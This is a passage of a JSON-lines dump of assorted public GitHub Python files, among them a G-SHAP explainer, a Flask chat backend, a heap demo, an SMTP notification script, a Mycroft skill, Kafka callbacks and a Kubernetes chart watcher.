sklearn.datasets import load_boston\n from sklearn.linear_model import LinearRegression\n\n X, y = load_boston(return_X_y=True)\n reg = LinearRegression().fit(X,y)\n explainer = gshap.KernelExplainer(\n \\ model=reg.predict, data=X, g=lambda x: x.mean()\n )\n explainer.gshap_values(X, nsamples=1000)\n ```\n\n Out:\n\n ```\n array([-8.52873964e-04, -4.90442234e-04, 9.42836482e-05, 3.98231297e-04,\n \\ 2.03149964e-03, 3.93086231e-03, -7.38176865e-06, 3.81400727e-03,\n \\ 5.19437337e-03, -1.34661588e-03, 7.08535145e-04, 1.50486721e-03,\n \\ -8.28480438e-03])\n ```\n\n As expected, all SHAP values are 0 for linear regression. We can see this \n when we compare the mean prediction for the original data `X` to the \n shuffled background data `explainer.data`.\n\n ```python\n explainer.compare(X, bootstrap_samples=1000)\n ```\n\n Out:\n\n ```\n 22.53280632411067, 22.52089950825812\n ```\n \"\"\"\n def __init__(self, model, data, g=lambda x: x.mean()):\n self.model = model\n self.data = data\n self.g = g\n\n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, X):\n self._data = (\n X.values if isinstance(X, (pd.DataFrame, pd.Series)) else X\n )\n self.N, self.P = self._data.shape\n\n @property\n def nsamples(self):\n \"\"\"Default number of samples to draw to approximate G-SHAP values\"\"\"\n return 2 * self.P + 2**11\n\n def compare(self, X, bootstrap_samples=1000):\n \"\"\"\n Compares the background data `self.data` to the comparison data `X` \n in terms of the general function `self.g`.\n\n Parameters\n ----------\n X : numpy.array or pandas.Series or pandas.DataFrame\n (# samples, # features) matrix of comparison data.\n\n bootstrap_samples : int, default=1000\n Number of bootstrapped samples for computing `g` of the \n background data.\n\n Returns\n -------\n g_comparison : float\n *g(model(X))*, where *X* is the comparison data.\n\n g_background : float\n *g(model(X_b))*, where *X_b* is the shuffled background data.\n \"\"\"\n def compute_g_background():\n sample = np.array(choices(self.data, k=X.shape[0]))\n if columns is not None:\n sample = pd.DataFrame(columns=columns, data=sample)\n return self.g(self.model(sample))\n\n columns = get_columns(X)\n X = X.to_frame().T if isinstance(X, pd.Series) else X\n g_data = [compute_g_background() for _ in range(bootstrap_samples)]\n return self.g(self.model(X)), sum(g_data) / len(g_data)\n \n def gshap_values(self, X, **kwargs):\n \"\"\"\n Compute G-SHAP values for all features.\n\n Parameters\n ----------\n X : numpy.array or pandas.DataFrame or pandas.Series\n A (# samples, # features) matrix.\n\n nsamples : scalar or 'auto', default='auto'\n Number of samples to draw when approximating G-SHAP values.\n\n Returns\n -------\n gshap_values : np.array\n (# features,) vector of G-SHAP values ordered by feature index.\n \"\"\"\n return np.array(\n [self.gshap_value(j, X, **kwargs) for j in range(self.P)]\n )\n\n def gshap_value(self, j, X, **kwargs):\n \"\"\"\n Compute the G-SHAP value for feature `j`.\n\n Parameters\n ----------\n j : scalar or column name\n The index or column name of the feature of interest.\n\n X : numpy.array or pandas.DataFrame or pandas.Series\n A (# samples, # features) matrix.\n\n nsamples : scalar or 'auto', default='auto'\n Number of samples to draw when approximating G-SHAP values.\n\n Returns\n -------\n gshap_value : float\n Approximated G-SHAP value for feature `j` (float).\n \"\"\"\n j = list(X.columns).index(j) if isinstance(j, str) else j\n nsamples = kwargs.get('nsamples', self.nsamples)\n phi = [self._compute_phi(j, X) for m in range(nsamples)]\n return sum(phi) / len(phi)\n\n def _compute_phi(self, j, X):\n \"\"\"Approximate G-SHAP value for feature `j` for one sample\n \n This method approximates the G-SHAP value by Monte Carlo sampling.\n 1. Construct `Z` by sampling observations from the background dataset.\n 2. Shuffle the order of the features.\n 3. Construct `X_mj` (X minus the j'th feature) as all features from X \n which come before j. Absent features are filled in from `Z`.\n 4. Construct `X_pj` (X plus the j'th feature) by adding the original \n j'th feature from `X` to `X_mj`.\n 5. Return phi = g(model(X_pj)) - g(model(X_mj)).\n \"\"\"\n columns = get_columns(X)\n X = get_data(X)\n # Ensure feature dimension of X matches that of the background data\n assert X.shape[1] == self.P\n\n Z = np.array(choices(self.data, k=X.shape[0]))\n\n order = np.array(list(range(self.P)))\n np.random.shuffle(order)\n j_idx = order[j]\n\n X_mj = (\n (order < j_idx).astype(int) * X \n + (order >= j_idx).astype(int) * Z\n )\n X_pj = X_mj.copy()\n X_pj[:,j] = X[:,j]\n if columns is not None:\n X_mj = pd.DataFrame(columns=columns, data=X_mj)\n X_pj = pd.DataFrame(columns=columns, data=X_pj)\n\n return self.g(self.model(X_pj)) - self.g(self.model(X_mj))","repo_name":"dsbowen/gshap","sub_path":"gshap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"18629291027","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Api, Resource, reqparse, abort, fields, marshal_with\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_cors import CORS, cross_origin\nfrom flask_socketio import SocketIO\nfrom flask_httpauth import HTTPBasicAuth\n\n\napplication = Flask(__name__)\nsocketio = SocketIO(application, cors_allowed_origins=\"*\")\ncors = CORS(application, resources={r\"/*\": {\"origins\": \"*\", \"supports_credentials\": True}})\n\n# app.config['CORS_HEADERS'] = 'Content-Type'\napi = Api(application)\napplication.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///database.db\"\napplication.config['SECRET_KEY'] = 'your_secret_key_here'\ndb = SQLAlchemy(application)\nmigrate = Migrate(application, db)\n\n\nfrom resources.UserResources import UserAll, UserById, UserByToken, UserLogIn, UserChatRooms, SignUp, FriendResource, UpdateProfilePicture, UpdateChatRooms, ProfilePictureResource\nfrom resources.GroupChatResources import GroupChatAll, GroupChatById, GroupChatAddUser, GroupChatMessages, RecentMessagesResource, OlderMessagesResource\nfrom resources.MessageResources import MessageResource\nfrom resources.MultimediaResources import MultimediaResource, MultimediaFile\nfrom resources.FriendRequestResources import FriendRequestResource\n\n# Routes\n# Users\napi.add_resource(UserAll, \"/all-users/\") \napi.add_resource(SignUp, \"/signup\")\napi.add_resource(UserByToken, \"/users/\")\napi.add_resource(UserById, \"/users/id/\")\napi.add_resource(UserLogIn, \"/users/login\")\napi.add_resource(UserChatRooms, \"/users/chatrooms\")\napi.add_resource(FriendResource, \"/friends\")\napi.add_resource(UpdateChatRooms, \"/users/update-chatrooms\")\napi.add_resource(UpdateProfilePicture, \"/update-profile-picture\")\napi.add_resource(ProfilePictureResource, \"/profile-picture/\")\n\n# Friend requests\napi.add_resource(FriendRequestResource, \"/friend_requests\")\n\n# Group Chats\napi.add_resource(GroupChatAll, \"/groupchats/\")\napi.add_resource(GroupChatById, \"/groupchats/\")\napi.add_resource(GroupChatAddUser, \"/groupchats//adduser\")\napi.add_resource(GroupChatMessages, '/groupchats//messages')\napi.add_resource(RecentMessagesResource, '/groupchats//recent-messages')\napi.add_resource(OlderMessagesResource, '/groupchats//older-messages/')\n\n# Messages\napi.add_resource(MessageResource, '/messages/')\n\n# Multimedia\napi.add_resource(MultimediaResource, '/messages//multimedia')\napi.add_resource(MultimediaFile, '/multimedia/')\n\n\nif __name__ == '__main__':\n socketio.run(application, host = '0.0.0.0', debug=True)","repo_name":"ignacio-urrutia/MyApp-backend","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"4163829447","text":"#\n# @author : SRvSaha\n# Filename : corpus_clean.py\n# Timestamp : 13:53 14-August-2016 (Sunday)\n# Description : SCRIPT to remove all punctuations with \" \" and removes all non-Malayalam stuffs\n# Requirement : Python 3\n#\n\nimport re\n\noutput = \"\"\nlines = []\nout = []\n\nwith open(\"TRY-1.txt\") as f:\n lines = f.readlines()\n\n\ndef corpus_clean(lines):\n global output # Since we want to use the global output\n for line in lines:\n string = \"\"\n # Only when it's when it is in the range of Malayalam Unicode and also\n # when space is there between words or the punctuations\n for i in line:\n if ord(i) >= ord('\\u0D00') and ord(i) <= ord('\\u0D7F') or ord(i) >= 32 and ord(i) <= 47 or ord(i) >= 58 and ord(i) <= 63:\n if ord(i) >= 33 and ord(i) <= 47 or ord(i) >= 58 and ord(i) <= 63:\n i = \" \" # Remove all punctuations with \" \"\n string += i\n string = re.sub(' +',' ',string) # Removing two or more spaces with single space\n if len(string) > 1: # Len = 1 when it's \" \"\n output += string + '\\n'\n with open(\"clean_output.txt\", 'w') as f:\n f.write(output)\n print(\"Operation Successful :)\")\n\nif __name__ == \"__main__\":\n corpus_clean(lines)\n","repo_name":"SRvSaha/Python_Automation_Scipts","sub_path":"corpus_clean.py","file_name":"corpus_clean.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"21449632285","text":"\"\"\"\n* Author: Mohamed Marzouk\n* -------------------------------------\n* Binary Heap Data Structure (Min Heap)\n* -------------------------------------\n* Time Complixty:\n * Building: O(N)\n * Inserting: O(log(N))\n * Peaking [first element]: Big Theta(1)\n * Polling [delete]: Big Theta(log(N))\n * Merging: Big Theta(N)\n* Used Language: Python\n* Usage:\n * Heap is used while implementing a priority queue.\n * Dijkstra’s Algorithm\n * Heap Sort\n\"\"\"\ndef heapify(arr, size, i):\n smallest = i;\n left = 2 * i + 1;\n right = 2 * i + 2;\n\n if left < size and arr[i] > arr[left]:\n smallest = left;\n if right < size and arr[smallest] > arr[right]:\n smallest = right\n if smallest != i:\n arr[i], arr[smallest] = arr[smallest], arr[i] # Swapping\n heapify(arr, size, smallest)\n\ndef insert(arr, num):\n size = len(arr)\n arr.append(num)\n if size != 0:\n for i in range(((len(arr) - 1) // 2), -1, -1):\n heapify(arr, len(arr), i)\n\ndef deleteNode(arr, num):\n size = len(arr)\n for i in range(0, size):\n if arr[i] == num: break\n arr[i], arr[size - 1] = arr[size - 1], arr[i]\n arr.remove(arr[size - 1])\n for i in range(((len(arr) - 1) // 2), -1, -1):\n heapify(arr, len(arr), i)\n\narr = []\n\ninsert(arr, 3)\ninsert(arr, 4)\ninsert(arr, 9)\ninsert(arr, 5)\ninsert(arr, 2)\n\nprint (\"Min-Heap array: \" + str(arr))\n\"\"\"\n 2\n / \\\n 3 9\n /\\\n 5 4\n\"\"\"\n\ndeleteNode(arr, 2)\nprint(\"After deleting an element: \" + str(arr))\n\"\"\"\n 3\n / \\\n 4 9\n /\n 5\n\"\"\"\n","repo_name":"109-marzouk/Algorithms-and-Data-Structures","sub_path":"Data Structures/Heap.py","file_name":"Heap.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27025805912","text":"def yes_or_not(message, result): # Verifica si la opción seleccionada es 's' o 'n' , e itera hasta que lo sea\n while result not in ('s', 'n'):\n result = input(message)\n if result == 'n' or result == 's' :\n return result \n \ndef insert_into_array(array, item): # inserta en un array sin duplicados\n into = False\n if len(array) > 0:\n for i in array:\n if i == item:\n into = True\n if into == False:\n array.append(item)\n return array\n \ndef get_enum_key(options,option,val): # retorna el nombre, dado el valor del enum. (Puede ser dado el acronimo o el precio)\n for opt in (options):\n if opt.value[val] == option:\n return opt.name\n \ndef give_options(format,title,options,duplicates): # Dato un enum, lista las opciones disponibles e itera hasta que la respuesta sea válida. Puede darse el caso de que retorne un valor numerico, o una lista con valores (no repetidos), dependiendo de los parámetros pasados\n print('\\n****** '+title+' : ******\\n')\n text = ''\n for option in (options):\n if format == 'inline':\n text = text + option.name + ' ('+option.value[0]+') '\n else:\n print('* '+text + option.name + ' ('+option.value[0]+') ')\n if format != 'inline':\n array = []\n print('\\n')\n text = 'Indique la opción (enter para terminar)' \n current_option = input(text+' : ')\n correct = False\n while True:\n if current_option == \"\":\n return array\n for option in (options):\n if option.value[0] == current_option:\n if format == 'inline':\n return get_enum_key(options,current_option,0)\n else:\n if duplicates == False:\n array = insert_into_array(array, get_enum_key(options,current_option,0))\n elif duplicates == True:\n array.append(get_enum_key(options,current_option,0))\n correct = True\n if correct == False:\n current_option = input(text + '. Por favor, indique una respuesta válida : ')\n else:\n current_option = input(text+ ' : ')\n correct = False\n","repo_name":"stephanie-cruz/MiniProyectoPython","sub_path":"utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14861814191","text":"import re\nimport Configruation\nimport XmlReader\nfrom email.mime.text import MIMEText\nfrom email.utils import formataddr\nfrom email.header import Header\n# from email.mime.application import MIMEApplication\n# from email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nimport smtplib\naccount = Configruation.USERNAME + '@ericsson.com'\nsender = Configruation.EMAILSENDER #'jian.peng@ericsson.com'\nreceivers = Configruation.EMAILRECVIERS\npasswd = str(Configruation.USERPASSWORD,'utf-8')\nmailcontents = Configruation.EMAILSUJECT\nmailserver = 'se-smtp.ericsson.se'\nsub = 'Product Delivery Update Notify'\nxmlFileName = './DeliveryInformation.xml'\ntry:\n msg = MIMEMultipart('related')\n print('mail sender is :' + str(sender))\n msg['From'] = formataddr([\"sender\", sender])\n print('mail recvier list:'+ ','.join(receivers))\n msg['To'] = Header(\",\".join(receivers)) #formataddr([\"receiver\", receive])\n msg['Subject'] = mailcontents\n print('mail Subject is :' + str(mailcontents))\n #contents information\n # msg.attach(txt)\n # txt = MIMEText(Configruation.LOGINURL+'?title='+Configruation.LOGINJUMPTOPAGE, 'plain', 'utf-8')\n # msg.attach(txt)\n #attach file\n # attach = MIMEApplication(open(\"D:\\xx\\\\tool\\pycharm\\\\1.csv\").read())\n # attach.add_header('Content-Disposition', 'attachment', filename='1.csv')\n # msg.attach(attach)\n tableHeadTemplate = ' {0}'\n tableContentsTemplate = '{0}'\n tableContentsLinkTemplate = ' {1} '\n emailCommentsTemplate = '

{0}

{1}

'\n # emailCommentsContentsTemplate = '

{0}

'\n tableContents = ''\n tableHeads = ''\n emailComments = ''\n wikiLink = tableContentsLinkTemplate.format(Configruation.LOGINURL+'?title='+Configruation.LOGINJUMPTOPAGE,'The Delivery Note Wiki Link')\n for head in Configruation.DELIVERY_TABLE_HEAD:\n tableHeads = tableHeads + tableHeadTemplate.format(head)\n tableContents = ''\n contentList = XmlReader.getAnSpecialCategoryValue(xmlFileName, 'DliveryInfo',['Value'])\n for contentitem in contentList:\n contentitem = str(contentitem[0]).replace('\\n','
')\n if '[' in contentitem:\n contentitemlinklist = []\n breaklinefalg = False\n if '
' in contentitem:\n contentitemlinklist = contentitem.split('
')\n breaklinefalg = True\n else:\n contentitemlinklist.append(contentitem)\n contentitemlinkcounter = 0\n contentitem = ''\n for contentitemlink in contentitemlinklist:\n if '[' in contentitemlink:\n contentlist = contentitemlink.replace('[','').replace(']','').split(' ')\n tablecellcontents = ''.join(contentlist[1:])\n contentitem += tableContentsLinkTemplate.format(contentlist[0],tablecellcontents)\n if breaklinefalg and contentitemlinkcounter < len(contentitemlinklist)-1:\n contentitem += '
'\n contentitemlinkcounter += 1\n tableContents = tableContents + tableContentsTemplate.format(contentitem)\n emailCommentsTitleList = XmlReader.getAnSpecialCategoryValue(xmlFileName, 'Delivery_Email_Content',['Title'])\n emailCommentsContentList = XmlReader.getAnSpecialCategoryValue(xmlFileName, 'Delivery_Email_Content', ['Contents'])\n for i in range(len(emailCommentsTitleList)):\n emailComments = emailComments + emailCommentsTemplate.format(str(emailCommentsTitleList[i][0]).replace('\\n', '
') ,\n str(emailCommentsContentList[i][0]).replace('\\n','
  '))\n # commentsContentsSpilt = str(emailCommentsContentList[i]).replace('\\n','
')\n # commentsContents = ''\n # for row in emailCommentsContentList[i].split('\\n'):\n # commentsContents = commentsContents + emailCommentsContentsTemplate.format(row)\n # emailComments = emailComments+ commentsContents\n body = \"\"\"\n \n \n \n \n Delivery Contents\n \n \n \n {1}\n \n \n {2}\n \n \n {3}\n \n
\n {4}\n


This page auto generate by delivery record program
\n \n \n \n \"\"\".format('{line-height: 5px;}',wikiLink,tableHeads,tableContents,emailComments)\n text = MIMEText(body, 'html', 'utf-8')\n # f = open('D:\\xx\\pip.png', 'rb')\n # pic = MIMEImage(f.read())\n # f.close()\n # pic.add_header('Content-ID', '')\n msg.attach(text)\n server = smtplib.SMTP(mailserver, 587)\n # server.set_debuglevel(1)\n server.ehlo()\n server.starttls()\n try:\n server.login(sender, passwd)\n except Exception as e:\n try:\n server.login(account, passwd)\n except Exception as e:\n print('mail login failed' + str(e.with_traceback()))\n pass\n print('mail server login success')\n server.sendmail(sender, receivers, msg.as_string())\n print('mail send...')\n print('mail send success')\n server.quit()\n print('mail server quit')\nexcept Exception as e:\n print('mail script run error' + str(e.with_traceback()))","repo_name":"pengjianaixue/Delivery-Record","sub_path":"Delivery_Record_WIKI_Proxy_Server/Delivery_Record_Notify_EmailSend.py","file_name":"Delivery_Record_Notify_EmailSend.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10436710416","text":"import os\n\nfrom adapt.intent import IntentBuilder\nfrom mycroft.skills.core import MycroftSkill, intent_handler\nfrom mycroft.util.log import LOG\nfrom mycroft.audio import wait_while_speaking \n\n__author__ = 'Chirag'\n\nclass WhatCanYouDoSkill(MycroftSkill):\n\n def __init__(self):\n super(WhatCanYouDoSkill, self).__init__(name=\"WhatCanYouDoSkill\")\n \n @intent_handler(IntentBuilder(\"\").require(\"What\").require(\"Can\").require(\"Do\"))\n def handle_what_can_do__intent(self, message):\n # tell user what he can do\n self.speak_dialog(\"what.i.can\") \n \n # execute function getSkills -> get list of installed skills\n self.getSkills() \n\n def getSkills(self):\n # get list of skills via msm and search for \"installed\"\n self.myskills = os.popen('msm list | grep installed').read() \n self.myskills = self.myskills.replace('\\n', ', ').replace('\\r', ', ').replace('[installed],', ',').replace('\\t', '') # replace unwanted characters and make nice list\n # get number of skills\n nr_skills = len(self.myskills.split()) \n\n if nr_skills < 1: # if msm did not give us what we want (no matter why) do alternative skill search\n self.myskills = os.popen('ls /opt/mycroft/skills/').read() # Get folders in /opt/mycroft/skills\n self.myskills = self.myskills.replace('\\n', ', ').replace('\\r', ', ').replace('\\t', '') # replace unwanted characters and make nice list\n nr_skills = len(self.myskills.split()) # get number of skills\n \n if nr_skills < 1: # if msm and alternative skill search fails than tell user that we couldn't do the job\n wait_while_speaking() # always wait\n self.speak_dialog(\"not.found\") # tell user that we couldn't do the job\n return # if all fails, return\n # always wait\n wait_while_speaking() \n # we found skills -> yeah. tell user how many!\n self.speak_dialog('found', {'nrskills': nr_skills}) \n # always wait\n wait_while_speaking() \n # ask user if we should give him a list of all his skills.\n self.should_getskills = self.get_response('ask.getskills') \n # get list of confirmation words\n self.yes_words = set(self.translate_list('yes')) \n # execute function listSkills -> if user confirmed -> give him a list of all his skills, else -> exit\n self.listSkills() \n \n def listSkills(self):\n if self.should_getskills: # if user said something\n resp_getskills = self.should_getskills.split() # split user sentence into list\n if any(word in resp_getskills for word in self.yes_words): # if any of the words from the user sentences is yes\n self.speak_dialog('my.skills') # Introduction that we will give user list of skills\n self.speak(self.myskills.strip()) # tell user list of skills\n else: # no word in sentence from user was yes\n self.speak_dialog('no.skills') # give user feedback\n\n def shutdown(self):\n super(WhatCanYouDoSkill, self).shutdown()\n\n def stop(self):\n pass\n\ndef create_skill():\n return WhatCanYouDoSkill()\n","repo_name":"writetovibhor/what-can-you-do-skill","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14741267243","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\ndf=pd.read_csv('survey_results_public.csv',index_col='ResponseId')\n\ndf.shape\n\ndf\n\ndf.columns\n\ndf.PlatformHaveWorkedWith.unique()\n\ndf.Employment.unique()\n\ndf['Employment'].value_counts(normalize=True)\n\nslice=[0.643088,0.141390,0.096504,0.035536,0.029536,0.024615]\nlabels=['Employed full-time ','Student, full-time ','Independent contractor, freelancer, or self-employed',\n 'Not employed, but looking for work ','Employed part-time','Student, part-time ']\n\nplt.pie(slice,labels=labels,autopct='%1.1f%%',wedgeprops={'edgecolor':'black'})\n\n\ndf.rename(columns={'ConvertedCompYearly':'Salary'},inplace=True)\n\ndf['Salary'].median()\n\ncountry_group=df.groupby(['Country'])\n\ncountry_group.get_group('Greece')\n\nsal_gre=country_group['Salary'].median().loc['Greece']\n\nsal_germ=country_group['Salary'].median().loc['Germany']\n\nsal_aus=country_group['Salary'].median().loc['Austria']\nsal_gre\nsal_germ\nsal_aus\n\nsal_neth=country_group['Salary'].median().loc['Netherlands']\nsal_neth\n\navg_sal=[25944.0,64859.0,54049.0,59676.0]\nlabels=['Greece','Germany','Austria','Netherlands']\n\nplt.pie(avg_sal,labels=labels)\n\n\n\ncountry_uses_python=country_group['LanguageHaveWorkedWith'].apply(lambda x:x.str.contains('Python').sum())\n\n\ncountry_uses_python.head(10)\n\n\ngre_py=country_uses_python.loc['Greece']\n\n\ncan_py=country_uses_python.loc['Canada']\n\n\nger_py=country_uses_python.loc['Germany']\n\n\naustr_py=country_uses_python.loc['Australia']\n\n\nuse_python=[gre_py,can_py,ger_py,austr_py]\n\nlabels=['Greece','canada','Germany','Australia']\nexplode=[0.1,0,0,0]\n\n\nplt.pie(use_python,labels=labels,explode=explode)\n\n\n\n\n\n\n","repo_name":"SamDimitra/Python-Pandas-Matplotlib","sub_path":"exercise2/Python-Pandas-Matplotlib-2.py","file_name":"Python-Pandas-Matplotlib-2.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7214674118","text":"from src import kafka, schemas, logging, messages\nfrom src import repository_automation_item, repository_automation_step, repository_automation_item_history\nfrom threading import Thread\n\n__module_name__ = 'src.callbacks'\n\n\ndef send_to_kafka(current_step, automation_item, message):\n Thread(target=kafka.kafka_producer, args=(current_step.topic, automation_item.uuid, message,)).start()\n\n\ndef verify_if_next_step_exists(msg, automation_item):\n if msg['steps']['next_step'] is not None:\n if 'Exception' in msg['status']:\n current_step, message = next_step_not_exists(msg)\n\n automation_item.status = 'failed'\n msg['try_count'] = msg['try_count'] - 1\n\n description = f'{str(msg[\"status\"])}'\n logging.send_log_kafka('EXCEPTION', __module_name__, 'verify_if_next_step_exists',\n f'Item {msg[\"uuid\"]} marked as Error', msg[\"transaction_id\"])\n\n else:\n current_step, message = next_step_exists(msg, automation_item)\n\n automation_item.status = 'pending'\n description = messages.ITEM_SENT_TO_QUEUE.format(current_step.topic)\n logging.send_log_kafka('INFO', __module_name__, 'verify_if_next_step_exists',\n f'Item {msg[\"uuid\"]} sent to Queue {current_step.topic}', msg[\"transaction_id\"])\n\n send_to_kafka(current_step, automation_item, message)\n\n else:\n automation_item.status = 'finished'\n description = messages.ITEM_FINISHED\n logging.send_log_kafka('INFO', __module_name__, 'verify_if_next_step_exists',\n f'Item {msg[\"uuid\"]} finished.', msg[\"transaction_id\"])\n\n return description\n\n\ndef next_step_exists(msg, automation_item):\n max_step = msg['steps']['max_steps']\n\n current_step = repository_automation_step.get_by_uuid(uuid=msg['steps']['next_step']['uuid'])\n next_step = repository_automation_step.get_step_by_automation_id(\n automation_id=msg['steps']['next_step']['automation_id'],\n step=msg['steps']['next_step']['step'] + 1) \\\n if msg['steps']['next_step']['step'] < max_step else None\n\n next_step = next_step.to_json() if next_step else None\n\n automation_item.automation_step = current_step\n\n schema_automation_step_item = schemas.AutomationItemGetSchema()\n schema_data = schema_automation_step_item.dump(automation_item)\n\n json_steps = {\n \"steps\": {\n \"max_steps\": max_step,\n \"current_step\": current_step.to_json(),\n \"next_step\": next_step\n }\n }\n\n json_try_count = {\n \"try_count\": current_step.try_count\n }\n\n transaction_id = {\n \"transaction_id\": msg[\"transaction_id\"]\n }\n\n schema_data.update(json_steps)\n schema_data.update(json_try_count)\n schema_data.update(transaction_id)\n message = schema_data\n\n return current_step, message\n\n\ndef next_step_not_exists(msg):\n current_step = repository_automation_step.get_by_uuid(uuid=msg['steps']['current_step']['uuid'])\n message = msg\n return current_step, message\n\n\ndef items_processed(app, key, msg):\n with app.app_context():\n automation_item = repository_automation_item.get_by_uuid(uuid=msg['uuid'])\n if automation_item:\n if msg['try_count'] > 1:\n\n description = verify_if_next_step_exists(msg, automation_item)\n\n else:\n if 'Exception' in msg['status']:\n automation_item.status = 'failed'\n description = f'{str(msg[\"status\"])}'\n logging.send_log_kafka('EXCEPTION', __module_name__, 'items_processed',\n f'It was not possible to process the item {msg[\"uuid\"]}',\n msg[\"transaction_id\"])\n\n else:\n description = verify_if_next_step_exists(msg, automation_item)\n logging.send_log_kafka('INFO', __module_name__, 'items_processed',\n f'Item {msg[\"uuid\"]} processed successfully', msg[\"transaction_id\"])\n\n new_item = {\n \"data\": msg['data'],\n \"steps\": msg['steps'],\n }\n\n try:\n repository_automation_item_history.create(automation_item=automation_item, description=f'{description}')\n except Exception as e:\n logging.send_log_kafka('CRITICAL', __module_name__, 'items_processed', e.args[0],\n msg[\"transaction_id\"])\n try:\n repository_automation_item.update(automation_item, new_item)\n logging.send_log_kafka('INFO', __module_name__, 'items_processed',\n f'Item {msg[\"uuid\"]} updated successfully', msg[\"transaction_id\"])\n except Exception as e:\n logging.send_log_kafka('CRITICAL', __module_name__, 'items_processed', e.args[0],\n msg[\"transaction_id\"])\n\n\ndef items_in_process(app, key, msg):\n with app.app_context():\n automation_item = repository_automation_item.get_by_uuid(uuid=msg['uuid'])\n if automation_item:\n automation_item.status = 'running'\n try:\n repository_automation_item.update_status(automation_item)\n logging.send_log_kafka('INFO', __module_name__, 'items_in_progress',\n f'Item {msg[\"uuid\"]} is running', msg[\"transaction_id\"])\n except Exception as e:\n logging.send_log_kafka('CRITICAL', __module_name__, 'items_in_progress', e.args[0],\n msg[\"transaction_id\"])\n\n","repo_name":"danbsilva/queue-orchestrator","sub_path":"automation-service/src/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"33893410864","text":"from tkinter import *\nfrom PIL import ImageTk, Image\nfrom geo2d import *\n\n\nclass Window(Tk):\n def __init__(self):\n super().__init__()\n self.image = Image.open(\"photo.jpg\")\n self.photo = ImageTk.PhotoImage(self.image)\n print(self.image.size[0])\n self.canvas = Canvas(self, width=self.image.size[0], height=self.image.size[1])\n self.canvas.create_image(0, 0, anchor=NW, image=self.photo)\n self.segment = Segment(Point(100, 200), Point(800, 300))\n self.x = self.segment.p1.x\n self.y = self.segment.p1.y\n self.ch = self.canvas.create_line(self.segment.p1.x - 5, self.segment.p1.y, self.segment.p1.x + 5,\n self.segment.p1.y)\n self.cv = self.canvas.create_line(self.segment.p1.x, self.segment.p1.y - 5, self.segment.p1.x,\n self.segment.p1.y + 5)\n self.canvas.pack()\n self.ligne = self.canvas.create_line(self.seg_to_tuple(self.segment))\n self.geometry(f\"{self.image.size[0]}x{self.image.size[1]}\")\n self.key_down = False\n self.bind('', self.down, add='+')\n self.bind('', self.up)\n self.increment = 1\n\n def down(self, event):\n if not self.key_down:\n print(event.keysym ,self.increment)\n if event.keysym == \"Right\" and self.x < self.segment.get_xmax():\n self.x += self.increment\n self.x = min(self.x,self.segment.get_xmax())\n elif event.keysym == \"Left\" and self.x > self.segment.get_xmin():\n self.x -= self.increment\n self.x = max(self.x, self.segment.get_xmin())\n elif event.keysym == \"Shift_L\":\n self.increment = 30\n self.y = self.segment.get_y(self.x)\n self.croix()\n\n def up(self, event):\n self.key_down = False\n if event.keysym == \"Shift_L\":\n self.increment = 1\n\n\n def seg_to_tuple(self, seg: Segment):\n return (seg.p1.x, seg.p1.y, seg.p2.x, seg.p2.y)\n\n def croix(self):\n self.canvas.coords(self.ch, self.x - 5, self.y, self.x + 5, self.y)\n self.canvas.coords(self.cv, self.x, self.y - 5, self.x, self.y + 5)\n","repo_name":"oultetman/profil","sub_path":"profil.py","file_name":"profil.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"3414597228","text":"import asyncio\nimport logging\n\nfrom kubernetes_asyncio import watch\n\nfrom deployer.commands import redeploy\n\nlog = logging.getLogger(__name__)\n\ntype_mapping = {\n \"ADDED\": redeploy,\n \"MODIFIED\": redeploy,\n}\n\n\ndef _emit_event(event):\n module = type_mapping.get(event[\"type\"])\n if module:\n asyncio.ensure_future(module.handle_event(event))\n\n\nasync def monitor(crds, namespace):\n log.info(f\"Monitoring charts.k8s.openttd.org in namespace '{namespace}' for changes ...\")\n\n # Prepare what function we want to call with which parameters\n func = crds.list_namespaced_custom_object\n args = [\"k8s.openttd.org\", \"v1\", namespace, \"charts\"]\n\n # Start by listing all entries, and emit an 'ADDED' for each existing\n # entry. This allows us to get in a known-good-state, and monitor all\n # changes after.\n initial_list = await func(*args)\n for item in initial_list['items']:\n _emit_event({\"type\": \"ADDED\", \"object\": item})\n\n # The list has the resource_version we should use as starting point of\n # our watch().\n resource_version = initial_list['metadata']['resourceVersion']\n\n my_watch = watch.Watch()\n # XXX - kubernetes-asyncio has not sync'd with upstream yet.\n # See https://github.com/kubernetes-client/python-base/commit/2d69e89dab7134186cbcdaf82381ab6295c6c394\n # and https://github.com/tomplus/kubernetes_asyncio/issues/77\n # If this gets fixed, the next line can be removed.\n my_watch.resource_version = resource_version\n\n async with my_watch.stream(func, *args, 